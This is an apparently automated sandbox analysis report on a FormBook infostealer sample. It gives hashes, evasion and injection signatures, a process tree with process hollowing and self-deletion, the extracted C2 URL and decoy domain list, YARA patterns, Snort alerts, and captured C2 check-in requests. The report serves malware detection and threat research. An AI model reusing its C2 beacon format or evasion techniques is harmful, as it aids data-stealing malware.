
Windows Analysis Report divpCHa0h7.exe

Overview

General Information

Sample Name: divpCHa0h7.exe
Analysis ID: 502315
MD5: fda0d823b262ac2b1bd76a2053c29692
SHA1: 73f72d7c987d44d1f236c138c5617b527c5ba340
SHA256: 91a166f9a29ad832c9640078210a47e5afa928ab1a79a7b40d3b358e9c8bc5d5
Tags: exe

Detection

Threat: FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Self deletion via cmd delete
.NET source code contains potential unpacker
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • divpCHa0h7.exe (PID: 3240 cmdline: 'C:\Users\user\Desktop\divpCHa0h7.exe' MD5: FDA0D823B262AC2B1BD76A2053C29692)
    • divpCHa0h7.exe (PID: 5712 cmdline: C:\Users\user\Desktop\divpCHa0h7.exe MD5: FDA0D823B262AC2B1BD76A2053C29692)
    • divpCHa0h7.exe (PID: 4132 cmdline: C:\Users\user\Desktop\divpCHa0h7.exe MD5: FDA0D823B262AC2B1BD76A2053C29692)
    • divpCHa0h7.exe (PID: 2256 cmdline: C:\Users\user\Desktop\divpCHa0h7.exe MD5: FDA0D823B262AC2B1BD76A2053C29692)
      • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • msdt.exe (PID: 6440 cmdline: C:\Windows\SysWOW64\msdt.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
        • cmd.exe (PID: 6732 cmdline: /c del 'C:\Users\user\Desktop\divpCHa0h7.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 6760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.esyscoloradosprings.com/fqiq/"], "decoy": ["driventow.com", "ipatchwork.today", "bolder.equipment", "seal-brother.com", "mountlaketerraceapartments.com", "weeden.xyz", "sanlifalan.com", "athafood.com", "isshinn1.com", "creationslazzaroni.com", "eclecticrenaissancewoman.com", "satellitephonstore.com", "cotchildcare.com", "yamacorp.digital", "ff4cuno43.xyz", "quicksticks.community", "govindfinance.com", "farmersfirstseed.com", "megacinema.club", "tablescaperendezvous4two.com", "ecarehomes.com", "floaterslaser.com", "benisano.com", "saint444.com", "thedusi.com", "avafxtrade.online", "hanenosuke.com", "suntioil4u.com", "healthyweekendtips.com", "24000words.com", "ofbchina.net", "begukiu0.info", "wolmoda.com", "mask60.com", "4bellemaison.com", "mambacustomboats.com", "sedsn.com", "doggycc.com", "kangrungao.com", "pharmacistcharisma.com", "passiverewardssystems.com", "qywyfeo8.xyz", "shenjiclass.com", "rdoi.top", "lavishbynovell.com", "fleetton.com", "hillcresthomegroup.com", "hartfulcleaning.com", "srofkansas.com", "applebroog.industries", "phillytrainers.com", "dmc--llc.com", "sosoon.store", "daysyou.com", "controldatasa.com", "markarge.com", "hirayaawards.com", "clinicscluster.com", "sophiagunterman.art", "kirtansangeet.com", "residential.insure", "ribbonofficial.com", "qianhaijcc.com", "fytvankin.quest"]}

Yara Overview

Memory Dumps

Source: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp
Rule: JoeSecurity_FormBook
Description: Yara detected FormBook
Author: Joe Security

Source: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp
Rule: Formbook_1
Description: autogenerated rule brought to you by yara-signator
Author: Felix Bilstein - yara-signator at cocacoding dot com
Strings:
  • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Source: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp
Rule: Formbook
Description: detect Formbook in memory
Author: JPCERT/CC Incident Response Group
Strings:
  • 0x16ae9:$sqlite3step: 68 34 1C 7B E1
  • 0x16bfc:$sqlite3step: 68 34 1C 7B E1
  • 0x16b18:$sqlite3text: 68 38 2A 90 C5
  • 0x16c3d:$sqlite3text: 68 38 2A 90 C5
  • 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16c53:$sqlite3blob: 68 53 D8 7F 8C

Source: 00000005.00000002.361762124.00000000005D0000.00000040.00020000.sdmp
Rule: JoeSecurity_FormBook
Description: Yara detected FormBook
Author: Joe Security

Source: 00000005.00000002.361762124.00000000005D0000.00000040.00020000.sdmp
Rule: Formbook_1
Description: autogenerated rule brought to you by yara-signator
Author: Felix Bilstein - yara-signator at cocacoding dot com
Strings:
  • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

(table truncated; 27 entries in total)

      Unpacked PEs

Source: 5.2.divpCHa0h7.exe.400000.0.unpack
Rule: JoeSecurity_FormBook
Description: Yara detected FormBook
Author: Joe Security

Source: 5.2.divpCHa0h7.exe.400000.0.unpack
Rule: Formbook_1
Description: autogenerated rule brought to you by yara-signator
Author: Felix Bilstein - yara-signator at cocacoding dot com
Strings:
  • 0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Source: 5.2.divpCHa0h7.exe.400000.0.unpack
Rule: Formbook
Description: detect Formbook in memory
Author: JPCERT/CC Incident Response Group
Strings:
  • 0x15ce9:$sqlite3step: 68 34 1C 7B E1
  • 0x15dfc:$sqlite3step: 68 34 1C 7B E1
  • 0x15d18:$sqlite3text: 68 38 2A 90 C5
  • 0x15e3d:$sqlite3text: 68 38 2A 90 C5
  • 0x15d2b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x15e53:$sqlite3blob: 68 53 D8 7F 8C

Source: 1.2.divpCHa0h7.exe.3c268a0.2.raw.unpack
Rule: JoeSecurity_FormBook
Description: Yara detected FormBook
Author: Joe Security

Source: 1.2.divpCHa0h7.exe.3c268a0.2.raw.unpack
Rule: Formbook_1
Description: autogenerated rule brought to you by yara-signator
Author: Felix Bilstein - yara-signator at cocacoding dot com
Strings:
  • 0xcd2c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0xcd662:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0xf50e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0xf5482:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0xd9375:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x101195:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0xd8e61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x100c81:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0xd9477:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x101297:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0xd95ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x10140f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xce07a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0xf5e9a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0xd80dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xffefc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xcedf2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0xf6c12:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0xde867:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x106687:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0xdf90a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

(table truncated; 14 entries in total)

          Sigma Overview

          System Summary:

Sigma detected: Possible Applocker Bypass
Source: Process started, Author: juju4, Data: Command: C:\Windows\SysWOW64\msdt.exe, CommandLine: C:\Windows\SysWOW64\msdt.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\msdt.exe, NewProcessName: C:\Windows\SysWOW64\msdt.exe, OriginalFileName: C:\Windows\SysWOW64\msdt.exe, ParentCommandLine: C:\Users\user\Desktop\divpCHa0h7.exe, ParentImage: C:\Users\user\Desktop\divpCHa0h7.exe, ParentProcessId: 2256, ProcessCommandLine: C:\Windows\SysWOW64\msdt.exe, ProcessId: 6440

          Jbx Signature Overview

          AV Detection:

Found malware configuration
Source: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, Malware Configuration Extractor: FormBook {"C2 list": ["www.esyscoloradosprings.com/fqiq/"], "decoy": ["driventow.com", "ipatchwork.today", "bolder.equipment", "seal-brother.com", "mountlaketerraceapartments.com", "weeden.xyz", "sanlifalan.com", "athafood.com", "isshinn1.com", "creationslazzaroni.com", "eclecticrenaissancewoman.com", "satellitephonstore.com", "cotchildcare.com", "yamacorp.digital", "ff4cuno43.xyz", "quicksticks.community", "govindfinance.com", "farmersfirstseed.com", "megacinema.club", "tablescaperendezvous4two.com", "ecarehomes.com", "floaterslaser.com", "benisano.com", "saint444.com", "thedusi.com", "avafxtrade.online", "hanenosuke.com", "suntioil4u.com", "healthyweekendtips.com", "24000words.com", "ofbchina.net", "begukiu0.info", "wolmoda.com", "mask60.com", "4bellemaison.com", "mambacustomboats.com", "sedsn.com", "doggycc.com", "kangrungao.com", "pharmacistcharisma.com", "passiverewardssystems.com", "qywyfeo8.xyz", "shenjiclass.com", "rdoi.top", "lavishbynovell.com", "fleetton.com", "hillcresthomegroup.com", "hartfulcleaning.com", "srofkansas.com", "applebroog.industries", "phillytrainers.com", "dmc--llc.com", "sosoon.store", "daysyou.com", "controldatasa.com", "markarge.com", "hirayaawards.com", "clinicscluster.com", "sophiagunterman.art", "kirtansangeet.com", "residential.insure", "ribbonofficial.com", "qianhaijcc.com", "fytvankin.quest"]}
Multi AV Scanner detection for submitted file
Source: divpCHa0h7.exe, Virustotal: Detection: 16%
Source: divpCHa0h7.exe, ReversingLabs: Detection: 17%
Yara detected FormBook
Source: Yara match, File source: 5.2.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.2.divpCHa0h7.exe.3c268a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.1.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.1.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.2.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.2.divpCHa0h7.exe.3bdc680.3.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.361762124.00000000005D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000000.290893406.0000000006D39000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000000.307316377.0000000006D39000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000001.265367323.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000F.00000002.519918692.0000000002660000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.361951579.00000000009D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000F.00000002.517884800.0000000000610000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.267848070.0000000003AB9000.00000004.00000001.sdmp, type: MEMORY
Source: 5.2.divpCHa0h7.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.1.divpCHa0h7.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: divpCHa0h7.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: divpCHa0h7.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: msdt.pdbGCTL, source: divpCHa0h7.exe, 00000005.00000002.364340178.0000000002E40000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdbUGP, source: divpCHa0h7.exe, 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, msdt.exe, 0000000F.00000002.521663389.0000000004BBF000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb, source: divpCHa0h7.exe, msdt.exe
Source: Binary string: msdt.pdb, source: divpCHa0h7.exe, 00000005.00000002.364340178.0000000002E40000.00000040.00020000.sdmp
Source: C:\Users\user\Desktop\divpCHa0h7.exe, Code function: 4x nop then pop ebx, 5_2_00406AB9
Source: C:\Windows\SysWOW64\msdt.exe, Code function: 4x nop then pop ebx, 15_2_02766AB9

          Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49768 -> 104.165.34.6:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49768 -> 104.165.34.6:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49768 -> 104.165.34.6:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49789 -> 108.167.135.122:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49789 -> 108.167.135.122:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49789 -> 108.167.135.122:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49812 -> 8.212.24.67:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49812 -> 8.212.24.67:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49812 -> 8.212.24.67:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe, Network Connect: 23.227.38.74 80
Source: C:\Windows\explorer.exe, Network Connect: 81.169.145.161 80
Source: C:\Windows\explorer.exe, Domain query: www.mambacustomboats.com
Source: C:\Windows\explorer.exe, Domain query: www.sanlifalan.com
Source: C:\Windows\explorer.exe, Domain query: www.esyscoloradosprings.com
Source: C:\Windows\explorer.exe, Network Connect: 104.165.34.6 80
Source: C:\Windows\explorer.exe, Network Connect: 108.167.135.122 80
Source: C:\Windows\explorer.exe, Network Connect: 64.190.62.111 80
Source: C:\Windows\explorer.exe, Domain query: www.ribbonofficial.com
Source: C:\Windows\explorer.exe, Domain query: www.floaterslaser.com
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor, URLs: www.esyscoloradosprings.com/fqiq/
Source: global traffic, HTTP traffic detected:
  GET /fqiq/?z0DH=f0Dtar1PYnAdDzS&ZvEd=MhZqZeIh1bEx9EPhBOs++VNt6zdxCxYLlsX+VD+R30361cyojbkVOC5VQe1OoxOfJLYr HTTP/1.1
  Host: www.ribbonofficial.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic, HTTP traffic detected:
  GET /fqiq/?ZvEd=prTEVkQtidVRbelnknUsCYHPcHrUQSHWronmvObfBYwGPcpLSCQwPhh2tosJT24FW2ZT&z0DH=f0Dtar1PYnAdDzS HTTP/1.1
  Host: www.sanlifalan.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic, HTTP traffic detected:
  GET /fqiq/?z0DH=f0Dtar1PYnAdDzS&ZvEd=cd5R1bQkGt60ucaw3I3E0k/wUnqrUWXrQueIKe7m3jIZGD6slZfTAntz2qvR4Gb0BO+l HTTP/1.1
  Host: www.floaterslaser.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic, HTTP traffic detected:
  GET /fqiq/?ZvEd=oM7C4s4K9Ux9NUwG97tedYlymorHgm5Kv3Umj1Gnv/i5ubiDMWU/+XDfdu3U3Pyuil7R&z0DH=f0Dtar1PYnAdDzS HTTP/1.1
  Host: www.mambacustomboats.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic, HTTP traffic detected:
  GET /fqiq/?ZvEd=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8My9QnEOoaqj&z0DH=f0Dtar1PYnAdDzS HTTP/1.1
  Host: www.esyscoloradosprings.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic, HTTP traffic detected:
  HTTP/1.1 403 Forbidden
  Date: Wed, 13 Oct 2021 17:47:34 GMT
  Content-Type: text/html
  Transfer-Encoding: chunked
  Connection: close
  Vary: Accept-Encoding
  X-Sorting-Hat-PodId: 216
  X-Sorting-Hat-ShopId: 59389116584
  X-Dc: gcp-europe-west1
  X-Request-ID: cecbddb8-e852-4c90-927e-af3e5555f963
  X-Content-Type-Options: nosniff
  X-Permitted-Cross-Domain-Policies: none
  X-XSS-Protection: 1; mode=block
  X-Download-Options: noopen
  CF-Cache-Status: DYNAMIC
  Server: cloudflare
  CF-RAY: 69da64d2c8f74303-FRA
  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
  Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c
  Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css">
Source: global traffic, HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Wed, 13 Oct 2021 17:47:45 GMT
  Server: Apache/2.4.51 (Unix)
  Content-Length: 196
  Connection: close
  Content-Type: text/html; charset=iso-8859-1
  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic, HTTP traffic detected:
  HTTP/1.1 503 Service Unavailable
  Content-Type: text/html; charset=UTF-8
  Content-Length: 884
  Connection: close
  P3P: CP="CAO PSA OUR"
  Expires: Thu, 01 Jan 1970 00:00:00 GMT
  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  Pragma: no-cache
  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 56 69 72 75 73 2f 53 70 79 77 61 72 65 20 44 6f 77 6e 6c 6f 61 64 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 50 52 41 47 4d 41 22 20 43 4f 4e 54 45 4e 54 3d 22 4e 4f 2d 43 41 43 48 45 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 20 20 23 63 6f 6e 74 65 6e 74 20 7b 0d 0a 20 20 20 20 62 6f 72 64 65 72 3a 33 70 78 20 73 6f 6c 69 64 23 61 61 61 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 31 2e 35 65 6d 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 31 2e 35 65 6d 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 0d 0a 20 20 7d 0d 0a 20 20 68 31 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 33 65 6d 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 23 31 39 36 33 39 30 3b 0d 0a 20 20 7d 0d 0a 20 20 62 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 23 31 39 36 33 39 30 3b 0d 0a 20 20 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 23 65 37 65 38 65 39 22 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 3c 68 31 3e 56 69 72 75 73 2f 53 70 79 77 61 72 65 20 44 6f 77 6e 6c 6f 61 64 20 42 6c 6f 63 6b 65 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 44 6f 77 6e 6c 6f 61 64 20 6f 66 20 74 68 65 20 